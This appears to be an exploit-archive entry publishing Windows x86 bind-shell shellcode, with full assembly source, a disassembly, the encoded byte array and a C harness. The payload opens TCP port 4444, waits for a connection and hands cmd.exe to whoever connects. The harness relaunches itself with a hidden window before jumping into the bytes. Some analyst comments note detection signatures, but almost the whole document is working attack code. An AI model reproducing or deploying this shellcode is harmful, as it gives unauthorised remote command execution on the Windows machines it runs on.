Windows x86 - Bind Shell TCP Shellcode



EKU-ID: 5842 CVE: OSVDB-ID:
Author: Roziul Hasan Khan Shifat Published: 2016-09-09 Verified: Verified


/*
    # Title : Windows x86 bind shell tcp shellcode
    # Author : Roziul Hasan Khan Shifat
    # Date : 08-09-2016
    # Tested On : Windows 7 Ultimate , Starter x86
*/
 
//Note: This shellcode only works on x86
 
/*
section .text
    global _start
_start:
 
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB.Ldr
mov esi,[eax+0x14] ;PEB.Ldr->InMemoryOrderModuleList
lodsd
xchg esi,eax
lodsd
mov edi,[eax+0x10] ;kernel32.dll base address
 
 
mov ebx,[edi+0x3c] ;DOS->e_lfanew
add ebx,edi ;PE HEADER
mov ebx,[ebx+0x78]
add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY
 
 
sub esp,32
lea esi,[esp]
 
 
mov cx,660
 
mov edx,[ebx+0x1c] ;AddressOfFunctions
add edx,edi
 
mov eax,[edx+ecx]
add eax,edi
 
mov [esi],dword eax ;CreateProcessA() at offset 0
 
mov cx,1128
 
mov eax,[edx+ecx]
add eax,edi
 
mov [esi+4],dword eax ;ExitProcess() at offset 4
 
;------------------------------------
;finding base address of ws2_32.dll
 
mov cx,3312
 
mov eax,[edx+ecx]
add eax,edi
 
xor ecx,ecx
push 0x41416c6c
mov [esp+2],word cx
push 0x642e3233
push 0x5f327377
 
lea ebx,[esp]
 
push ebx
call eax
 
;---------------------------
mov edi,eax
;---------------------
mov ebx,[edi+0x3c] ;DOS->e_lfanew
add ebx,edi ;PE HEADER
mov ebx,[ebx+0x78]
add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY
 
mov edx,[ebx+0x1c] ;AddressOfFunctions
add edx,edi
 
xor ecx,ecx
mov cx,456
 
mov eax,[edx+ecx]
add eax,edi
 
mov [esi+8],dword eax ;WSAStartup() at offset 8
 
mov cx,392
 
mov eax,[edx+ecx]
add eax,edi
 
mov [esi+12],dword eax ;WSASocketA() at offset 12
 
 
mov eax,[edx+4]
add eax,edi
 
mov [esi+16],dword eax ;bind() at offset 16
 
mov eax,[edx+48]
add eax,edi
 
mov [esi+20],dword eax ;listen() at offset 20
 
mov eax,[edx]
add eax,edi
 
mov [esi+24],dword eax ;accept() at offset 24
 
mov eax,[edx+80]
add eax,edi
 
mov [esi+28],dword eax ;setsockopt() at offset 28
;-------------------------------------------------
;WSAStartup(514, &WSADATA)
mov cx,400
sub esp,ecx
 
lea ebx,[esp]
 
mov cx,514
 
push ebx
push ecx
 
call dword [esi+8]
 
 
;-----------------------------------------
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
 
xor ecx,ecx
 
push ecx
push ecx
push ecx
 
mov cl,6
push ecx
 
sub ecx,5
push ecx
 
inc ecx
push ecx
 
call dword [esi+12]
;----------------------------
mov edi,eax ;SOCKET
 
;----------------------------------
;setsockopt(sock,0xffff,4,&int l=1,int j=2)
 
cdq
mov dl,2
 
push edx
dec edx
 
push edx
lea ecx,[esp]
 
mov dl,4
 
push ecx
push edx
 
mov dx,0xffff
push edx
push edi
 
call dword [esi+28]
 
 
;--------------------------------------------
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16);
 
cdq
 
push edx
push edx
push edx
push edx
 
mov [esp],byte 2
mov [esp+2],word 0x5c11 ;port 4444
 
lea ecx,[esp]
mov dl,16
 
push edx
push ecx
push edi
 
call dword [esi+16]
 
;--------------------------------
;listen(SOCKET,1);
cdq
inc edx
push edx
push edi
 
call dword [esi+20]
;-----------------------------
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16);
 
cdq
push edx
push edx
push edx
push edx
mov dl,16
lea ecx,[esp]
 
 
 
push edx
lea ebx,[esp]
 
push ebx
push ecx
push edi
 
call dword [esi+24]
;-----------------------
mov edi,eax ;client socket
;-----------------------
 
cdq
sub esp,16
lea ebx,[esp] ;PROCESS_INFORMATION
 
push edi
push edi
push edi
push edx
 
push edx
 
mov dl,255
inc edx
 
push edx
cdq
 
push edx
push edx
push edx
push edx
push edx
 
push edx
push edx
push edx
push edx
push edx
 
mov dl,68
push edx
 
lea ecx,[esp] ;STARTUPINFOA
 
cdq
push 0x41657865
mov [esp+3],byte dl
push 0x2e646d63
 
lea eax,[esp]
 
;---------------------------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION)
 
push ebx
push ecx
 
push edx
push edx
push edx
 
inc edx
push edx
cdq
 
push edx
push edx
 
push eax
push edx
 
call dword [esi]
;-----------------------
push eax
call dword [esi+4]
 
*/
 
 
/*
 
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 78 10                mov    0x10(%eax),%edi
  12:   8b 5f 3c                mov    0x3c(%edi),%ebx
  15:   01 fb                   add    %edi,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 fb                   add    %edi,%ebx
  1c:   83 ec 20                sub    $0x20,%esp
  1f:   8d 34 24                lea    (%esp),%esi
  22:   66 b9 94 02             mov    $0x294,%cx
  26:   8b 53 1c                mov    0x1c(%ebx),%edx
  29:   01 fa                   add    %edi,%edx
  2b:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  2e:   01 f8                   add    %edi,%eax
  30:   89 06                   mov    %eax,(%esi)
  32:   66 b9 68 04             mov    $0x468,%cx
  36:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  39:   01 f8                   add    %edi,%eax
  3b:   89 46 04                mov    %eax,0x4(%esi)
  3e:   66 b9 f0 0c             mov    $0xcf0,%cx
  42:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  45:   01 f8                   add    %edi,%eax
  47:   31 c9                   xor    %ecx,%ecx
  49:   68 6c 6c 41 41          push   $0x41416c6c
  4e:   66 89 4c 24 02          mov    %cx,0x2(%esp)
  53:   68 33 32 2e 64          push   $0x642e3233
  58:   68 77 73 32 5f          push   $0x5f327377
  5d:   8d 1c 24                lea    (%esp),%ebx
  60:   53                      push   %ebx
  61:   ff d0                   call   *%eax
  63:   89 c7                   mov    %eax,%edi
  65:   8b 5f 3c                mov    0x3c(%edi),%ebx
  68:   01 fb                   add    %edi,%ebx
  6a:   8b 5b 78                mov    0x78(%ebx),%ebx
  6d:   01 fb                   add    %edi,%ebx
  6f:   8b 53 1c                mov    0x1c(%ebx),%edx
  72:   01 fa                   add    %edi,%edx
  74:   31 c9                   xor    %ecx,%ecx
  76:   66 b9 c8 01             mov    $0x1c8,%cx
  7a:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  7d:   01 f8                   add    %edi,%eax
  7f:   89 46 08                mov    %eax,0x8(%esi)
  82:   66 b9 88 01             mov    $0x188,%cx
  86:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  89:   01 f8                   add    %edi,%eax
  8b:   89 46 0c                mov    %eax,0xc(%esi)
  8e:   8b 42 04                mov    0x4(%edx),%eax
  91:   01 f8                   add    %edi,%eax
  93:   89 46 10                mov    %eax,0x10(%esi)
  96:   8b 42 30                mov    0x30(%edx),%eax
  99:   01 f8                   add    %edi,%eax
  9b:   89 46 14                mov    %eax,0x14(%esi)
  9e:   8b 02                   mov    (%edx),%eax
  a0:   01 f8                   add    %edi,%eax
  a2:   89 46 18                mov    %eax,0x18(%esi)
  a5:   8b 42 50                mov    0x50(%edx),%eax
  a8:   01 f8                   add    %edi,%eax
  aa:   89 46 1c                mov    %eax,0x1c(%esi)
  ad:   66 b9 90 01             mov    $0x190,%cx
  b1:   29 cc                   sub    %ecx,%esp
  b3:   8d 1c 24                lea    (%esp),%ebx
  b6:   66 b9 02 02             mov    $0x202,%cx
  ba:   53                      push   %ebx
  bb:   51                      push   %ecx
  bc:   ff 56 08                call   *0x8(%esi)
  bf:   31 c9                   xor    %ecx,%ecx
  c1:   51                      push   %ecx
  c2:   51                      push   %ecx
  c3:   51                      push   %ecx
  c4:   b1 06                   mov    $0x6,%cl
  c6:   51                      push   %ecx
  c7:   83 e9 05                sub    $0x5,%ecx
  ca:   51                      push   %ecx
  cb:   41                      inc    %ecx
  cc:   51                      push   %ecx
  cd:   ff 56 0c                call   *0xc(%esi)
  d0:   89 c7                   mov    %eax,%edi
  d2:   99                      cltd  
  d3:   b2 02                   mov    $0x2,%dl
  d5:   52                      push   %edx
  d6:   4a                      dec    %edx
  d7:   52                      push   %edx
  d8:   8d 0c 24                lea    (%esp),%ecx
  db:   b2 04                   mov    $0x4,%dl
  dd:   51                      push   %ecx
  de:   52                      push   %edx
  df:   66 ba ff ff             mov    $0xffff,%dx
  e3:   52                      push   %edx
  e4:   57                      push   %edi
  e5:   ff 56 1c                call   *0x1c(%esi)
  e8:   99                      cltd  
  e9:   52                      push   %edx
  ea:   52                      push   %edx
  eb:   52                      push   %edx
  ec:   52                      push   %edx
  ed:   c6 04 24 02             movb   $0x2,(%esp)
  f1:   66 c7 44 24 02 11 5c    movw   $0x5c11,0x2(%esp)
  f8:   8d 0c 24                lea    (%esp),%ecx
  fb:   b2 10                   mov    $0x10,%dl
  fd:   52                      push   %edx
  fe:   51                      push   %ecx
  ff:   57                      push   %edi
 100:   ff 56 10                call   *0x10(%esi)
 103:   99                      cltd  
 104:   42                      inc    %edx
 105:   52                      push   %edx
 106:   57                      push   %edi
 107:   ff 56 14                call   *0x14(%esi)
 10a:   99                      cltd  
 10b:   52                      push   %edx
 10c:   52                      push   %edx
 10d:   52                      push   %edx
 10e:   52                      push   %edx
 10f:   b2 10                   mov    $0x10,%dl
 111:   8d 0c 24                lea    (%esp),%ecx
 114:   52                      push   %edx
 115:   8d 1c 24                lea    (%esp),%ebx
 118:   53                      push   %ebx
 119:   51                      push   %ecx
 11a:   57                      push   %edi
 11b:   ff 56 18                call   *0x18(%esi)
 11e:   89 c7                   mov    %eax,%edi
 120:   99                      cltd  
 121:   83 ec 10                sub    $0x10,%esp
 124:   8d 1c 24                lea    (%esp),%ebx
 127:   57                      push   %edi
 128:   57                      push   %edi
 129:   57                      push   %edi
 12a:   52                      push   %edx
 12b:   52                      push   %edx
 12c:   b2 ff                   mov    $0xff,%dl
 12e:   42                      inc    %edx
 12f:   52                      push   %edx
 130:   99                      cltd  
 131:   52                      push   %edx
 132:   52                      push   %edx
 133:   52                      push   %edx
 134:   52                      push   %edx
 135:   52                      push   %edx
 136:   52                      push   %edx
 137:   52                      push   %edx
 138:   52                      push   %edx
 139:   52                      push   %edx
 13a:   52                      push   %edx
 13b:   b2 44                   mov    $0x44,%dl
 13d:   52                      push   %edx
 13e:   8d 0c 24                lea    (%esp),%ecx
 141:   99                      cltd  
 142:   68 65 78 65 41          push   $0x41657865
 147:   88 54 24 03             mov    %dl,0x3(%esp)
 14b:   68 63 6d 64 2e          push   $0x2e646d63
 150:   8d 04 24                lea    (%esp),%eax
 153:   53                      push   %ebx
 154:   51                      push   %ecx
 155:   52                      push   %edx
 156:   52                      push   %edx
 157:   52                      push   %edx
 158:   42                      inc    %edx
 159:   52                      push   %edx
 15a:   99                      cltd  
 15b:   52                      push   %edx
 15c:   52                      push   %edx
 15d:   50                      push   %eax
 15e:   52                      push   %edx
 15f:   ff 16                   call   *(%esi)
 161:   50                      push   %eax
 162:   ff 56 04                call   *0x4(%esi)
*/
 
 
#include<windows.h>
#include<stdio.h>
#include<shellapi.h>
#include<stdlib.h>
 
/*
 * Byte form of the _start routine listed above: the string is the byte
 * column of the "Disassembly of section .text" dump, in order, from
 * offset 0x0 through the `call *0x4(%esi)` at 0x162.  main() below
 * transfers control into it with a function-pointer cast, so this array
 * is the actual payload under test.
 *
 * Analyst notes (each point is visible in the disassembly / source above):
 *  - 0x49 .. 0x58: push 0x41416c6c / 0x642e3233 / 0x5f327377 assemble
 *    "ws2_32.dll" on the stack (the "AA" tail is zeroed by the word store
 *    at 0x4e) for the kernel32 export called at 0x61; the source comment
 *    for that call reads "finding base address of ws2_32.dll".
 *  - 0xf1: movw $0x5c11 writes the sockaddr_in port field; byte order
 *    11 5c is 0x115c = 4444 (source comment: "port 4444").
 *  - 0x142 .. 0x14b: push 0x41657865 / 0x2e646d63 assemble "cmd.exe";
 *    the 'A' at offset 3 is overwritten with dl, which is 0 after the
 *    cltd at 0x141 provided eax is non-negative at that point.
 *  - Every import is resolved through hard-coded AddressOfFunctions
 *    offsets (660, 1128, 3312 in kernel32; 456, 392, 4, 48, 0, 80 in
 *    ws2_32) rather than by name, so the bytes are presumably tied to the
 *    export-table layout of the Windows builds named in the header.
 *  - The constant fragments above ("ws2_32.dll", "cmd.exe", the port word
 *    11 5c) are stable static signature material for this sample.
 */
char shellcode[]=\

"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04";
 
/*
 * Harness that runs the byte array above.
 *
 *   i - argc; a - argv.
 *   No argument (i == 1): mode 1, re-launch this same executable (a[0])
 *   through ShellExecute with the single argument "78".
 *   Argument given: mode = atoi(a[1]); only 78 does anything, namely an
 *   indirect call into `shellcode`.  Any other value is a no-op.
 *   Returns 0 in all cases.
 *
 * Reviewer notes:
 *  - a[1] is read only when i > 1, so there is no out-of-bounds argv read;
 *    atoi() on a non-numeric argument yields 0, which lands in `default`.
 *  - The two behaviours worth recognising in telemetry are the process
 *    re-executing itself with a bare numeric argument, and the indirect
 *    call into a writable global array (a data-to-code transition, the
 *    kind of thing DEP/NX exists to stop).
 *  - ShellExecute's return value is not checked, so a failed re-launch is
 *    silent.
 */
int main(int i,char *a[])
{
 
    int mode;
 
 
 
    if(i==1)
    mode=1;                                 /* started by the user: spawn the child */
    else
    mode=atoi(a[1]);
 
switch(mode)
{
    case 1:
    ShellExecute(NULL,NULL,a[0],"78",NULL,0);   /* self-relaunch with the magic argument */
    break;
 
    case 78:
    (* (int(*)())shellcode )();             /* jump into the payload bytes */
    break;
 
    default:
    break;
}
 
 
return 0;
}